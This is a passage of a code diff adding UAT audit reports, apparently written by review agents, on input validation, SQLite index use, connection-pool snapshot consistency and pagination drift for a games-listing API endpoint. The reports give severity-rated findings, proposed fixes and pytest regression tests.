+(25 digits). Python `int(...)` succeeds, but `sqlite3` cannot bind a value
+outside signed-64-bit range and raises `OverflowError: Python int too large
+to convert to SQLite INTEGER` at the pool layer.
+
+**Affected code:** `_query_helpers.py:120–137` `_coerce_value` — accepts any
+Python int. The error surfaces inside `pool.read_one/read_all`. Whether the
+user sees 500 vs 503 depends on `db/pool.py`'s exception coverage (verify).
+Same vector via `?offset=2**70` and any future int filter field.
+
+**Fix:** Add a range check in `_coerce_value` for `int` (cap at signed-64-bit:
+`-(2**63) <= v <= 2**63 - 1`) and raise `QueryParamError` with proper 400.
+Defence-in-depth: pool wraps `OverflowError` → `PoolError`.
+
+**Regression test:**
+```python
+async def test_oversized_int_returns_400_not_500(client, games_pool_100):
+    r = await client.get(
+        "/api/v1/games?size_bytes_gte=" + "9" * 25,
+        headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+    )
+    assert r.status_code == 400
+    assert "value" in r.json()["detail"].lower()
+```
+
+---
+
+### SEV-3 — Empty `_in` value and trailing-comma `_in` silently accepted
+
+**Scenario A:** `?status_in=` → parsed as `status IN ('')` → returns no rows
+(no error). Operator sees an empty page from what they likely intended as
+"no filter" (link with trailing `=`).
+**Scenario B:** `?status_in=a,b,` → parsed as `status IN ('a','b','')` →
+includes a phantom empty-string match.
+
+**Affected code:** `_query_helpers.py:179–184` `parse_filters` `in` branch.
+
+**Fix:** After comprehension, drop empty strings, and raise
+`QueryParamError("empty value list for {field}_in")` if the resulting list
+is empty.
+
+**Regression tests:**
+```python
+def test_in_empty_raises():
+    with pytest.raises(QueryParamError, match="empty"):
+        parse_filters(QueryParams("status_in="), allow_list=_games_allow_list())
+
+def test_in_trailing_comma_drops_empty():
+    result = parse_filters(QueryParams("status_in=a,b,"), allow_list=_games_allow_list())
+    assert result == {"status": {"in": ["a", "b"]}}
+```
+
+---
+
+### SEV-3 — Duplicate query params (`limit`, `offset`, `sort`) silently shadow
+
+**Scenario:** `?sort=title&sort=size_bytes` — Starlette's `.get()` returns
+only the first; the second is silently dropped. Same for `limit` and
+`offset`. Operator gets behaviour they didn't request and no error.
+
+**Affected code:** `_query_helpers.py:55–56` (pagination), `:258` (sort) —
+all use `.get(...)` instead of `.getlist(...)`.
+
+**Fix:** For each reserved/sort param, check
+`if len(params.getlist(name)) > 1: raise QueryParamError(...)`.
+
+**Regression test:**
+```python
+async def test_duplicate_sort_param_returns_400(client, games_pool_100):
+    r = await client.get(
+        "/api/v1/games?sort=title&sort=size_bytes",
+        headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+    )
+    assert r.status_code == 400
+```
+
+---
+
+### SEV-3 — Comma-escape semantics undocumented in `_in` values
+
+**Scenario:** `?platform_in=a%2Cb` (URL-encoded comma `a,b`) is decoded by
+Starlette to `a,b` before `parse_filters`, so it splits as two values. There
+is no escape mechanism. Currently invisible because all real `_in` enums
+contain no commas — but the BL7 spec **locks the convention** for all
+future `_in` fields.
+
+**Affected code:** `_query_helpers.py:182` — `raw_value.split(",")` is
+unconditional.
+
+**Fix (choose one):**
+1. Document in spec §3.1: "Values in `_in` lists must not contain commas. No
+   escape mechanism." Add a `FilterAllowList` doctring warning.
+2. Add a quoting convention (e.g., backslash-escape or alternate separator
+   via `_in_sep=|`). More work; YAGNI for current enum-only `_in` usage.
+
+**Recommend option 1** + add an assertion in code that detects
+URL-decoded-comma corner cases if needed.
+
+---
+
+### SEV-3 — Reserved param namespace silently swallows colliding field names
+
+**Scenario:** If a future endpoint's allow-list declares a field literally
+named `limit`, `offset`, or `sort`, `parse_filters` will skip the param
+silently (line 152, `if key in reserved: continue`). The field is
+effectively unreachable as a filter.
+
+**Affected code:** `_query_helpers.py:152` reserved set; no validation in
+`FilterAllowList.__init__`.
+
+**Fix:** `FilterAllowList.__init__` raises if any allow-listed field name
+collides with the reserved set:
+```python
+RESERVED_PARAM_NAMES = frozenset({"limit", "offset", "sort"})
+def __init__(self, by_field):
+    bad = RESERVED_PARAM_NAMES & by_field.keys()
+    if bad:
+        raise ValueError(f"filter field names cannot use reserved param names: {sorted(bad)}")
+    object.__setattr__(self, "by_field", dict(by_field))
+```
+
+**Regression test:**
+```python
+def test_filter_allow_list_rejects_reserved_names():
+    with pytest.raises(ValueError, match="reserved"):
+        FilterAllowList({"limit": FilterFieldSpec(ops={"eq"}, value_type=int)})
+```
+
+---
+
+### SEV-3 — Op-set / `_OP_SQL` consistency not asserted
+
+**Scenario:** A future endpoint author adds `"like"` to
+`FilterFieldSpec.ops` but forgets to extend `_OP_SQL`. At runtime
+`build_where_clause` raises `KeyError("like")` → 500.
+
+**Affected code:** `_query_helpers.py:91–98` `_OP_SQL`; no startup invariant.
+
+**Fix:** `FilterAllowList.__init__` checks
+`spec.ops ⊆ _OP_SQL.keys() | {"in"}` for every spec.
+
+**Regression test:**
+```python
+def test_filter_allow_list_rejects_unsupported_op():
+    with pytest.raises(ValueError, match="op"):
+        FilterAllowList({"x": FilterFieldSpec(ops={"like"}, value_type=str)})
+```
+
+---
+
+### SEV-4 — Sort with same field twice produces redundant ORDER BY
+
+**Scenario:** `?sort=title:asc,title:desc` → `ORDER BY title ASC, title DESC, id ASC`.
+SQL-legal, but the second clause is a no-op and the user clearly didn't
+mean it.
+
+**Fix:** Either dedupe-by-field (first wins) or raise on duplicate.
+
+---
+
+### SEV-4 — Negative `size_bytes` accepted
+
+**Scenario:** `?size_bytes_gte=-1` accepted; semantically meaningless for
+the domain. Not a security issue.
+
+**Fix (optional):** Add `min_value` to `FilterFieldSpec` for int fields,
+or document as "garbage in, empty out".
+
+---
+
+### SEV-4 — Field-name suffix collision with operator suffixes (design lock)
+
+**Scenario:** Any future field whose name ends in `_eq`/`_in`/`_gte`/`_lte`/
+`_gt`/`_lt`/`_ne` is unreachable for the default-eq path. See vector A
+matrix.
+
+**Fix:** Add a validator in `FilterAllowList.__init__` that warns or rejects
+such names, and document the rule in `_query_helpers.py` docstring.
+
+---
+
+### SEV-4 — Case-insensitive operator suffix produces misleading error
+
+**Scenario:** `?size_bytes_GTE=100` → "unknown filter field: size_bytes_GTE".
+Operator may chase the wrong fix (think the field is renamed) instead of
+realising operator suffixes are case-sensitive.
+
+**Fix:** In the error path, attempt a case-insensitive suffix match; if it
+would match, emit "operator suffixes are case-sensitive — did you mean
+`size_bytes_gte`?".
+
+---
+
+## Non-findings (explicitly safe)
+
+- **SQL injection via filter values** — values flow exclusively through
+  `?` placeholders. Hypothesis property test
+  `TestSqlInjectionResistance::test_build_where_never_interpolates_values`
+  asserts this. Verified by reading `build_where_clause` (line 223 uses
+  `.format(field=field_name)` for the *field* — already allow-list-validated
+  — and appends the *value* to `params` via `?`).
+- **SQL injection via field name** — `field_name` is interpolated into the
+  SQL string but **only** after `if field_name not in allow_list.by_field`
+  rejection. Defensive re-check in `build_where_clause` (line 214) makes the
+  invariant layered. Sort fields same pattern at `build_order_by_clause`.
+- **Unicode in str field values** — passes through cleanly via SQLite
+  parameter binding; UTF-8 round-trips. No normalization issue at the API
+  layer (DB will compare bytewise).
+- **Float coerce for int field** — properly raises `QueryParamError`. Same
+  for `?owned=true` or non-numeric int.
+- **`limit=0` and `offset<0`** — both correctly rejected with explicit
+  error messages.
+- **`FilterCriterion` alias `in`** — `populate_by_name=True` + router
+  `model_dump(by_alias=True)` ensure JSON wire key is `"in"`, not `"in_"`.
+- **Empty `applied_filters`** — emits `{}` always (consistent envelope).
+- **Multiple criteria on same field (eq + in)** — documented "AND within
+  field" semantics in spec §3.1; behaviour matches.
+- **Multiple sort params** — *behaviour* is "first wins"; this is
+  documentable but listed as SEV-3 because it's currently silent.
+- **`sort=` empty value** — correctly applies default (because `not raw`
+  evaluates True for `""`). Only the `,,,`-style case is broken (SEV-2).
+- **Case-sensitive field allow-list** — `Platform` properly rejected.
+- **Sort direction case** — properly lowercased; `Asc` / `DESC` /
+  `dEsC` all accepted.
+
+---
+
+## Recommendation summary
+
+Before BL7 ships and these conventions propagate to `/jobs`, `/manifests`,
+`/stats`, `/block_list`:
+
+1. **Fix the SEV-2s** (sort-only-commas; oversized int → 500). These are
+   correctness bugs visible to the operator.
+2. **Lock the SEV-3 design decisions in code, not in spec prose**: add the
+   `FilterAllowList.__init__` invariants for reserved names + op-vs-SQL
+   consistency. Reject duplicate params explicitly. Reject empty `_in`
+   lists.
+3. **Document SEV-4s** (field-name suffix collision; comma escape policy;
+   case-sensitivity hints) in the `_query_helpers.py` module docstring so
+   the next endpoint author can't miss them.
+
+All proposed fixes are additive — no behavioural change for the BL7 happy
+paths in `tests/api/test_games_router.py`. They tighten boundaries that are
+currently undefined or silently accepted.

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/perf-correctness.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/perf-correctness.md
@@ -1,0 +1,300 @@
+# UAT-4 Performance + Correctness Audit
+**Agent:** perf-correctness
+**Date:** 2026-05-20
+**Scope:** `GET /api/v1/games` (BL7) + `_query_helpers.py` + downstream pool semantics
+**Persona:** senior backend engineer who has seen pagination + filter performance go bad in production. Looking for the next subtle bug, not the obvious one.
+
+---
+
+## A: Index utilization
+
+Verified empirically with `EXPLAIN QUERY PLAN` against the live `0001_initial.sql` schema seeded with 2000 representative rows. The planner choice does not change qualitatively at higher row counts; what changes is the absolute cost of the SCAN + TEMP B-TREE branches.
+
+| Filter + Sort (router-emitted SQL after tie-breaker) | Index used | Sort path | Notes / risk at 50K rows |
+|---|---|---|---|
+| (none) `ORDER BY title ASC, id ASC` (default) | none — `SCAN games` | TEMP B-TREE | Full read + full sort. ~50K rows × ~500 B = ~25 MB into temp store (we set `temp_store=MEMORY`). Sub-200 ms expected. |
+| (none) `ORDER BY size_bytes DESC, id ASC` | none — `SCAN games` | TEMP B-TREE | Same as default. Spec §4.3 acknowledges this; "add `idx_games_size_bytes` only if it shows up slow." Fine. |
+| (none) `ORDER BY last_prefilled_at DESC, id ASC` | **none — `SCAN games`** | **TEMP B-TREE** | **Spec §4.3 is wrong here.** Spec claims `idx_games_last_prefilled` is used; planner does NOT use the partial index for an unqualified sort because NULL rows would be missing. At 50K rows the Game_shelf "Recently Prefilled" panel (very common) does a full scan + full sort. See SEV-3. |
+| `WHERE last_prefilled_at >= ? ORDER BY last_prefilled_at DESC, id ASC` | **`idx_games_last_prefilled`** (SEARCH `> ?`) | TEMP B-TREE for the id tie-breaker | The filter qualifies the partial-index predicate (`IS NOT NULL` is implied by `>=`), so the index is finally usable. Index seek + small TEMP B-TREE for tie-break. Fast. |
+| `WHERE status = ? ORDER BY title ASC, id ASC` | `idx_games_status` (SEARCH) | TEMP B-TREE | Index seek → selectivity-bounded row set → sort that subset. Sub-50 ms at 50K rows for a selective status. |
+| `WHERE platform = ? ORDER BY title ASC, id ASC` | `idx_games_platform_app` (SEARCH on leading column) | TEMP B-TREE | Same shape; platform is binary (`steam`/`epic`), so the post-filter set is ~50% of the table — TEMP B-TREE still gets large. |
+| `WHERE platform = ? AND status = ?` | `idx_games_status` (planner chose status as more selective; `platform` re-checked at row) | TEMP B-TREE | Planner's choice is reasonable. Confirmed empirically. |
+| `WHERE status IN (?, ?, ?) ORDER BY last_prefilled_at DESC, id ASC` | `idx_games_status` (SEARCH per value) | TEMP B-TREE | OR-walk of the index. Common Game_shelf pattern. |
+| `SELECT COUNT(*) FROM games` (no filter) | **`SCAN games USING COVERING INDEX idx_games_status`** | n/a | Planner picks the smallest covering index for an unfiltered count (status is a short TEXT — narrowest index leaf size). Sub-ms even at 500K rows. SQLite does NOT have an O(1) row-count shortcut, so it does scan the index leaves. |
+| `SELECT COUNT(*) WHERE status = ?` | `idx_games_status` covering | n/a | Index range count. Fast. |
+| `SELECT COUNT(*) WHERE platform = ?` | `idx_games_platform_app` covering | n/a | Index range count. Fast. |
+
+**Worst case (no filter + `?sort=size_bytes:desc` or `?sort=last_prefilled_at:desc`):**
+- 5K rows: ~5–10 ms total. Fine.
+- 50K rows: ~30–80 ms total (TEMP B-TREE in memory, single allocator pass). Acceptable for a single-orchestrator workload.
+- 500K rows (hypothetical, well past MVP): ~300–800 ms; temp-store overhead may bleed past the in-memory budget into a temp file. At this scale, the spec's deferred `idx_games_size_bytes` and a dedicated non-partial `idx_games_last_prefilled_full` would be required.
+
+**Pre-existing redundancy (out of scope but worth flagging):** `idx_games_platform_app` duplicates the auto-created `sqlite_autoindex_games_1` from the `UNIQUE(platform, app_id)` table constraint. Two B-trees, double write amp, no read benefit. Not BL7's bug — file as cleanup follow-up.
+
+---
+
+## B: Connection pool semantics
+
+**Two acquisitions per request — not one.**
+
+`pool.read_one(count_sql, ...)` and `pool.read_all(rows_sql, ...)` each enter `_checkout_reader()` independently (`pool.py:909` and `pool.py:924`). Each call:
+1. `await self._readers.get()` — checkout from `asyncio.Queue(maxsize=8)`
+2. Execute statement on that reader
+3. `await self._readers.put(reader)` — return to queue
+
+Between the two calls the connection is fully released and the next call must re-acquire. There is no batching, no `WITH RECURSIVE`, no `read_transaction()` wrapper.
+
+**Implication 1 — pool capacity.** With default `pool_readers=8`, the endpoint consumes effectively 2× the request's apparent reader slot footprint when measured over a request lifetime. Concurrent saturation point:
+- Sustained ≥8 simultaneous in-flight `/api/v1/games` requests: pool fully booked.
+- Behavior on exhaustion: `await self._readers.get()` blocks indefinitely (the queue is unbounded-wait). There is **no timeout, no PoolBusy exception, no 503**. A burst of requests just queues up at the asyncio layer. Per-request latency grows linearly with depth. The fastapi/uvicorn worker can absorb plenty before client disconnect, but a runaway loop on the consumer side would manifest as slow responses, not a clean failure.
+- For a single-user orchestrator (the operator + Game_shelf SPA pulling 1 list at a time), this is fine. **For automated polling** (Game_shelf doing N parallel filtered fetches to render a dashboard), 8 concurrent requests starts to back-pressure. Worth noting in operator docs.
+
+**Implication 2 — connection-affinity is broken.** Because the COUNT and the SELECT use different reader connections, they cannot share a transaction. SQLite WAL mode gives each reader connection a snapshot-isolated view as of the first read on that connection, but each new acquisition opens a fresh snapshot. **Two different reader connections can therefore see two different points in time.**
+
+**Implication 3 — the race window (relevant to D below).** Sequence:
+```
+t0  COUNT acquires reader-A, sees snapshot S0, computes total=487, releases A
+t1  ── here a writer commits, replicating to WAL frame; readers' next acquire will see S1
+t2  SELECT ... LIMIT ? OFFSET ? acquires reader-B, sees snapshot S1, returns 50 rows
+```
+At t1 the row count may have changed. The response can report `total=487, len(games)=50` where the 50 rows came from a 488-row table. `has_more = offset + len(games) < total` is computed against a stale `total`. **Wire-visible artifact:** `total` and the rows can disagree by one or more depending on writes between t0 and t2. Single-user orchestrator + F3 daily sync → negligible odds in practice, but it IS observable.
+
+**Verdict: SEV-3.** Acceptable for MVP. Convention to fix in a follow-up: route both reads through `pool.read_transaction()` to share one reader connection AND one snapshot. That makes the COUNT + SELECT trivially consistent and halves reader-pool consumption per request. Recommend doing this BEFORE the convention propagates to `/jobs`, `/manifests`, etc., where row velocity is much higher.
+
+---
+
+## C: Memory profile
+
+**Per-row wire size estimate (200-char `last_error` worst case, typical otherwise):**
+
+| Field | Typical bytes | Worst case |
+|---|---|---|
+| `id` | 4 (digits) | 8 |
+| `platform` | 7 (`"steam"`) | 7 |
+| `app_id` | 8–10 | 66 (length cap is 64) |
+| `title` | 30 | ~200 (long titles exist; "Sid Meier's Civilization VI: Anthology" etc.) |
+| `owned` | 1 | 1 |
+| `size_bytes` | 12 (digits) | 14 |
+| `current_version`, `cached_version` | 40 each | 80 each |
+| `status` | 18 (`"validation_failed"`) | 18 |
+| `last_validated_at`, `last_prefilled_at` | 20 each (ISO 8601) | 20 each |
+| `last_error` | 0–200 | 200 |
+| `metadata` | 100–500 (depot lists) | bounded by SQLite TEXT — see below |
+| JSON keys + structural | ~140 | ~140 |
+| **per-row total** | ~400 B | ~900 B |
+
+**Response sizes:**
+- `limit=50` (default): ~20 KB.
+- `limit=500` (max): ~200–450 KB. Acceptable.
+- Hypothetical `limit=10000`: 4–9 MB. The 500 Pydantic model construction × 20 ≈ 10K instances. At ~1.5 KB per Pydantic v2 instance retained (after the new core), that's ~15 MB of heap held simultaneously plus the JSON encode buffer. **This is why `MAX_LIMIT=500` is the right guard.**
+
+**`_query_helpers.parse_pagination` enforces only what the caller passes.** The helpers themselves do NOT enforce a defensive ceiling lower than the endpoint declares. That is the right separation (helpers are policy-free) — but it does mean a future endpoint declaring `max_limit=10000` would be self-DoS-able from inside the trust boundary. Recommend adding a module-level `ABSOLUTE_MAX_LIMIT = 1000` cap inside `parse_pagination` and refusing any caller-passed `max_limit > ABSOLUTE_MAX_LIMIT` with a `QueryParamError`. SEV-4.
+
+**`applied_filters` echo size — `FilterCriterion` serialization defect:**
+
+This is the big one. Empirically verified by constructing `FilterCriterion(eq="steam")` and dumping it:
+
+```
+{"eq": "steam", "in": null, "gte": null, "lte": null, "gt": null, "lt": null, "ne": null}
+```
+
+The response model emits **all seven operator keys per filtered field**, six of them `null`. The spec §3.2 example shows the compact `{"platform": {"eq": "steam"}}` shape. The actual wire deviates from the spec.
+
+- Per filtered field overhead: ~80 bytes of null operator keys (vs ~15 bytes for just the populated op).
+- With 6 fields filtered, that's ~500 bytes of pure nulls in `applied_filters`.
+- With `_in` having 100 values × 6 fields filtered (hypothetical), the data is dominated by the IN list (good), but the null operator keys are still ~500 bytes pure waste.
+
+**This is SEV-2** — contract drift between spec and implementation, locks the wrong convention for every future paginated F9 endpoint, and bloats every response with `applied_filters` set. Fix: in `routers/games.py:262`, change `body.model_dump(by_alias=True)` to `body.model_dump(by_alias=True, exclude_none=True)`. Alternative: add `model_config = ConfigDict(extra="forbid", populate_by_name=True, json_schema_extra={"exclude_none": True})` — but `exclude_none` is a dump option, not a Config field. The cleanest fix is at the `model_dump` call.
+
+**Caveat — `exclude_none=True` interaction with `last_error`/`metadata`/`size_bytes` etc.** Many `GameResponse` fields are `T | None` and a `None` is a legitimate wire value. Naive `exclude_none=True` at the top level will drop them — clients then can't distinguish "field absent because null" from "field truly absent in this model version." The right fix is per-model: dump `FilterCriterion` with `exclude_none=True` but leave `GameResponse` alone. Easiest implementation: build the `applied_filters` dict by hand (e.g. `{"platform": {"eq": "steam"}}`) and skip the FilterCriterion wrapper entirely for serialization — keep it only for OpenAPI schema documentation. Document in the spec which convention won.
+
+---
+
+## D: Pagination drift under concurrent writes
+
+**The drift window has two layers:**
+
+**Layer 1 — within a single request** (analyzed in §B). Because COUNT and SELECT acquire separate reader connections with separate WAL snapshots, a writer between them can produce a response where `total` is off by ±N from the actual SELECT row count. Single-user orchestrator: negligible. Convention-setting concern.
+
+**Layer 2 — across requests by the same client** (the classic offset-drift problem):
+
+```
+F3 library_sync starts; inserts 200 new Steam games sorted alphabetically (Aphelion … Crysis Remastered)
+t0  Client GET /games?sort=title:asc&limit=50&offset=0    → ["Aardvark", … "Borderlands 3"] (50 rows)
+t1  F3 inserts "Abzu" (now sorts second)
+t2  Client GET /games?sort=title:asc&limit=50&offset=50   → 50 rows starting at the 51st of CURRENT state
+```
+
+Because "Abzu" is now in offset position 2, every row at offset ≥ 2 has shifted by one. The client's page-2 fetch (offset=50) returns the row that was at offset 49 in the original universe — i.e. one of the rows it already saw on page 1. **Same row appears on two consecutive pages.** Conversely, if F3 had DELETED a row at the front, page 2 would SKIP a row.
+
+**`id:asc` tie-breaker prevents WITHIN-PAGE row dup on tied sort values** (e.g. two games with identical `last_prefilled_at` and same offset boundary). It does NOT prevent BETWEEN-PAGE drift caused by inserts/deletes/sort-key updates landing in the offset range.
+
+**Worst-case drift in this codebase:**
+- F3 library_sync batches up to a few hundred upserts per platform per run. Typical runs are daily and complete in 30–120 seconds.
+- A Game_shelf user paginating through 500 rows at 50/page (10 fetches) over ~30 seconds while F3 is mid-sync could observe 5–20 duplicated or skipped rows in the most adversarial case (F3 happens to be inserting alphabetically into the range the user is scrolling).
+- Realistic case (F3 not running): zero drift.
+- Realistic case (F3 running but user not actively paginating): zero drift.
+
+**Verdict: SEV-3.** Acceptable for MVP per spec §6 risk register. Document the convention so Game_shelf doesn't assume strict snapshot semantics. The proper fix (cursor-based pagination keyed on `(sort_key, id) > last_seen`) is reserved for `/jobs` if/when retention grows. Add a brief note to `_query_helpers.py` module docstring describing the drift semantics so future endpoints inherit the same understanding.
+
+---
+
+## E: Metadata JSON parse cost
+
+**Typical metadata payload** (per spec §6 / Phase 1 data-model): depot list + build hints. Realistic shape:
+```json
+{"depots": [1086941, 1086942, 1086943], "build": "manifest_gid_xxx", "branch": "main"}
+```
+~100–200 bytes. `json.loads` on a row of this size: ~3–8 µs on a modern machine.
+
+**At limit=500:**
+- 500 rows × 5 µs ≈ 2.5 ms total parse cost. Negligible.
+
+**Pathological case** (1 MB metadata blob, e.g. a future F3 bug that stuffs the full Steam app manifest into the column):
+- 500 rows × ~30 ms parse = 15 s of CPU before response is built. Pydantic model construction with a 1 MB `dict[str, Any]` adds another ~10 ms per row.
+- Wire response: ~500 MB. The 200 KB target turns into 500 MB. JSONResponse builds the full body in memory before sending.
+- This would manifest as request timeouts, OOM, or both. There is no defensive cap on `metadata` size in the router.
+
+**Defensive recommendation (SEV-4):** Add a soft cap. Either:
+- `len(raw_meta) > 64 KB` → log `api.games.metadata_too_large` and return `None` (treat like a parse failure).
+- OR cap at the DB write side via a CHECK constraint in a future migration (`length(metadata) <= 65536`). Schema-level is better — applies to F3 directly.
+
+**Log volume risk on corrupt rows:** `_log.warning("api.games.metadata_parse_failed", game_id=...)` fires once per row per request. With 500 corrupt rows in the result set, that's 500 log lines per request. At even 10 RPS this is 5K log lines/sec — observability noise that hides real signals. Recommend: rate-limit the warning (one per request, aggregating count + sample game_ids), or downgrade to debug-level and rely on a CHECK constraint to surface corruption at write time. SEV-4.
+
+---
+
+## F: OpenAPI schema correctness
+
+**Verified empirically** via `FilterCriterion.model_json_schema()` and `GameListResponse.model_json_schema()`:
+
+- `in_` field with `alias="in"` renders as `"in"` in the schema property name. The alias is resolved correctly because the model has `populate_by_name=True` and `model_dump(by_alias=True)` is used at the router.
+- `additionalProperties: false` is set on every model declared with `extra="forbid"` (`GameResponse`, `FilterCriterion`, `SortFieldResponse`, `GamesMeta`, `GameListResponse`). Schema-drift detection works.
+- BUT: each operator field is typed `anyOf [{}, null]` (i.e. `Any | None`) in the schema. This is **technically accurate** for the model but **operationally useless** for clients — the schema doesn't tell a Game_shelf consumer what type `eq` will be for the `platform` field (string enum) vs `size_bytes` field (int). The OpenAPI doc doesn't distinguish. This is a minor surface defect inherent in modeling `FilterCriterion` as a generic across-field shape. SEV-4 — out of scope to fix in BL7 (would require per-field FilterCriterion subclasses, a contract-explosion not worth it for a debug-echo).
+
+**Surprise — the schema documents fields that NEVER appear in production responses:**
+
+Because of the SEV-2 defect in §C (all seven keys emitted with nulls), the schema's `properties` listing of `eq, in, gte, lte, gt, lt, ne` *does* match the wire — except every null field on the wire is documented as `anyOf [{}, null]` with default null. A spec-conformant client reading the OpenAPI doc will write code that handles all seven keys per criterion, which "happens to" match the (buggy) wire. **Fixing the SEV-2 defect with `exclude_none=True` will create a SCHEMA-VS-WIRE DRIFT**: schema still lists the seven keys; wire only sends populated ones. Most clients tolerate this (additionalProperties=false on receive doesn't apply to absent keys), but strict schema-validators that require all declared properties will reject. Recommend marking unused operator fields as not-required (Pydantic does this by default since they have `default=None`), which is already the case. So `exclude_none=True` is safe.
+
+**Verdict:** Schema is correct and matches current (buggy) wire. The schema will REMAIN correct after the `exclude_none` fix because all operator fields default to None (i.e. are not required). No schema change needed.
+
+---
+
+## G: Test coverage gaps + suggested additions
+
+**Existing tests** cover each axis (pagination, filter-per-field, sort, applied-echo, errors, auth, pool failure, metadata, last_error truncation) in isolation. Cross-combination + correctness-under-load gaps:
+
+**G1. Cross-combination test — filter + sort + pagination together, with `applied_*` echo audit.**
+```python
+async def test_filter_sort_pagination_combined(self, client, games_pool_100):
+    """Compound query: filter by platform AND status range, sort multi-field,
+    paginate. Verify (a) row order, (b) total count matches filter, (c) echo
+    reflects all parsed params, (d) has_more is correct."""
+    r = await client.get(
+        "/api/v1/games?platform=steam&size_bytes_gte=1000000000"
+        "&sort=last_prefilled_at:desc,title:asc&limit=10&offset=10",
+        headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+    )
+    body = r.json()
+    # All rows match the compound filter
+    for g in body["games"]:
+        assert g["platform"] == "steam"
+        assert g["size_bytes"] >= 1_000_000_000
+    # Sort order respected (and tie-breaker present)
+    titles_grouped_by_prefill = ...  # verify desc on prefilled_at, asc on title within
+    # Echo reflects EVERYTHING parsed
+    assert body["meta"]["applied_filters"]["platform"]["eq"] == "steam"
+    assert body["meta"]["applied_filters"]["size_bytes"]["gte"] == 1_000_000_000
+    assert body["meta"]["applied_sort"] == [
+        {"field": "last_prefilled_at", "direction": "desc"},
+        {"field": "title", "direction": "asc"},
+        {"field": "id", "direction": "asc"},
+    ]
+    # has_more arithmetic
+    assert body["meta"]["has_more"] == (10 + len(body["games"]) < body["meta"]["total"])
+```
+**Would catch the SEV-2 `applied_filters` shape bug** because it asserts equality on the dict (current implementation would fail because the dict actually has six extra null keys per criterion).
+
+**G2. Pagination consistency across pages — no duplicates, no gaps.**
+```python
+async def test_pagination_full_walk_no_dup_no_skip(self, client, games_pool_100):
+    """Walk all 100 rows in 10-row pages. Concatenated IDs must equal the
+    full unfiltered ID set with no duplicates and no skips."""
+    seen = []
+    for offset in range(0, 100, 10):
+        r = await client.get(
+            f"/api/v1/games?limit=10&offset={offset}&sort=title:asc",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        ids = [g["id"] for g in r.json()["games"]]
+        seen.extend(ids)
+    assert len(seen) == 100
+    assert len(set(seen)) == 100  # no duplicates
+    # And the tie-breaker means a tied-title row set is still stable: re-fetch
+    # any page and IDs must match.
+    r2 = await client.get(
+        "/api/v1/games?limit=10&offset=40&sort=title:asc",
+        headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+    )
+    assert [g["id"] for g in r2.json()["games"]] == seen[40:50]
+```
+Catches: (a) off-by-one in offset/limit math, (b) tie-breaker not actually being applied (would manifest as page re-fetch returning a different ordering when titles tie), (c) regressions in the SQL builder that drop the ORDER BY.
+
+**G3. Determinism of `applied_sort` echo with multi-field input.**
+```python
+async def test_applied_sort_echo_preserves_order(self, client, games_pool_100):
+    """The applied_sort echo must preserve the user's specified order, with
+    the tie-breaker appended LAST (not interleaved). Run twice — order must
+    be identical (no dict-ordering hazard)."""
+    for _ in range(2):
+        r = await client.get(
+            "/api/v1/games?sort=status:asc,size_bytes:desc,title:asc&limit=1",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        assert r.json()["meta"]["applied_sort"] == [
+            {"field": "status", "direction": "asc"},
+            {"field": "size_bytes", "direction": "desc"},
+            {"field": "title", "direction": "asc"},
+            {"field": "id", "direction": "asc"},
+        ]
+```
+The current implementation uses a `list[SortField]`, so order is stable by construction — but pin it with a test so a future refactor to a set/dict doesn't silently lose it.
+
+**G4 (bonus).** Repeated query-param keys: `?platform=steam&platform=epic` — verify documented behavior (Starlette returns first; the second is silently dropped). Currently undocumented and untested. Either pin the behavior with a test or raise `QueryParamError` on duplicates.
+
+---
+
+## Findings
+
+### SEV-1
+*(none)*
+
+### SEV-2
+- **`applied_filters` echo wire format does not match spec §3.2.** The `FilterCriterion` model emits all seven operator keys per filtered field, six as `null`. Spec example shows compact `{"eq": "steam"}`. Fix at `routers/games.py:262` — change to `body.model_dump(by_alias=True, exclude_none=True)` BUT scope the exclusion to `applied_filters` only (don't drop legitimate `None`s in `GameResponse` fields). Cleanest implementation: build `applied_filters` as a plain `dict[str, dict[str, Any]]` and skip the FilterCriterion wrapper entirely for output (keep it for OpenAPI documentation). Locks the right convention for every future paginated F9 endpoint. Test G1 above catches this.
+
+### SEV-3
+- **Spec §4.3 index-utilization claim is wrong for `?sort=last_prefilled_at:desc` (no filter).** The partial index `idx_games_last_prefilled WHERE last_prefilled_at IS NOT NULL` is NOT used by an unqualified `ORDER BY last_prefilled_at DESC`. The planner does `SCAN games + USE TEMP B-TREE FOR ORDER BY`. At 5K rows it's fine; at 50K+ rows the "Recently Prefilled" panel (a very common Game_shelf view) does a full table sort. Fix one of: (a) make the index non-partial in a follow-up migration, (b) update the spec/docs to be accurate about when the index applies (i.e. only with a `last_prefilled_at >= ?` filter), or (c) document that the canonical "recently prefilled" query MUST include `?last_prefilled_at_gte=<some_floor>` to engage the index — and have Game_shelf send it.
+- **COUNT + SELECT cross-snapshot inconsistency.** Two separate reader-pool acquisitions mean two WAL snapshots — `total` and the row set can disagree by ±N if a writer commits between them. Negligible probability for single-user MVP, but the convention locks here. Recommended follow-up: route both reads through `pool.read_transaction()` to share one connection and one snapshot. This also halves reader-pool consumption per request.
+- **Offset pagination drift under concurrent F3 writes.** Documented acceptable in spec §6 risk register. Worst case during F3 sync mid-pagination: 5–20 duplicated/skipped rows across a 500-row walk. Tie-breaker prevents in-page dup but not cross-page drift. Add a brief note to `_query_helpers.py` module docstring so this is the documented convention.
+
+### SEV-4
+- **No defensive `ABSOLUTE_MAX_LIMIT` ceiling in `parse_pagination`.** Helper trusts the caller's `max_limit`. A future endpoint declaring `max_limit=100000` is self-DoS-able. Add a module-level cap (e.g. 1000) and raise `QueryParamError` if the caller passes a higher `max_limit`.
+- **`metadata` column has no defensive size cap.** A future write of a 1 MB blob to one row would inflate a 500-row response to ~500 MB. Cap at the schema level via a CHECK constraint in a follow-up migration, or soft-cap in the router (treat oversize as parse failure).
+- **`api.games.metadata_parse_failed` warning fires once per row.** 500 corrupt rows = 500 log lines per request. Rate-limit or aggregate (one log per request with count + sample IDs).
